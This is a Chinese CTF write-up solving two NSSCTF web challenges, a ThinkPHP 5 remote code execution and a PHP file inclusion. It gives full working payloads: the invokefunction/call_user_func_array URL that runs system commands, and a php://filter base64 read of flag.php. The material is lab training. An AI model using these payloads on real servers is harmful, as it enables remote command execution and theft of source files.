NSSCTF-Web题目7

目录

[[SWPUCTF 2022 新生赛]ez_rce](#[SWPUCTF 2022 新生赛]ez_rce)

1、题目

2、知识点

3、思路

​编辑

[[MoeCTF 2022]baby_file](#[MoeCTF 2022]baby_file)

1、题目

2、知识点

3、思路


[SWPUCTF 2022 新生赛]ez_rce

1、题目
2、知识点

ThinkPHP V5 框架漏洞的利用,命令执行

由于ThinkPHP5在处理控制器传参时,没有对参数进行充分的过滤与验证,导致恶意用户可以通过提交恶意数据,构造出一个带有PHP函数的控制器方法,并通过URL参数的形式访问该方法,从而触发远程代码执行漏洞。

3、思路

打开题目,发现什么都没有,源代码里面也什么都没有,这时候尝试目录扫描

访问这个文件

接着访问提示文件

结果出现一个框架界面,ThinkPHP V5的框架,没有其他提示,上网搜一下这个框架,发现有一个远程执行命令的漏洞。

可以记住这一个框架漏洞,以后可能会利用到

利用poc如下:

url+?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统执行命令

http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=ls /

发现flag文件,结果打开什么都没有,找其他flag文件

http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=find / -name 'flag'

在 /nss/ctf/flag/flag 找到flag

http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=cat /nss/ctf/flag/flag

得到flag:NSSCTF{1671b36a-f1ad-4b41-98c7-ffbe7acb2959}


[MoeCTF 2022]baby_file

1、题目
2、知识点

php伪协议

3、思路

打开题目,出现源代码,没有其他提示,需要我们输入参数file的值

源码中有include()函数,考虑使用php伪协议,一般flag放在flag.php文件中

所以poc如下

?file=php://filter/read=convert.base64-encode/resource=flag.php

将得到的base64编码进行解码

得到flag:NSSCTF{9906ab65-97ea-400e-a1fa-72d7847a2e7a}


这篇文章就先写到这里了,哪里不懂的或者不足的欢迎指出

相关推荐
ALe要立志成为web糕手1 天前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
zhu12893035561 天前
网络安全的现状与防护措施
网络·安全·web安全
zhu12893035561 天前
网络安全与防护策略
网络·安全·web安全
virelin_Y.lin1 天前
系统与网络安全------Windows系统安全(1)
windows·安全·web安全·系统安全
zhu12893035561 天前
网络安全基础与防护策略
网络·安全·web安全
sszdlbw1 天前
BUUCTF-web刷题篇(6)
web安全·web·buuctf
zhu12893035562 天前
网络安全的重要性与防护措施
网络·安全·web安全
渗透测试老鸟-九青2 天前
面试经验分享 | 成都渗透测试工程师二面面经分享
服务器·经验分享·安全·web安全·面试·职场和发展·区块链
virelin_Y.lin2 天前
系统与网络安全------Windows系统安全(7)
windows·web安全·系统安全·ftp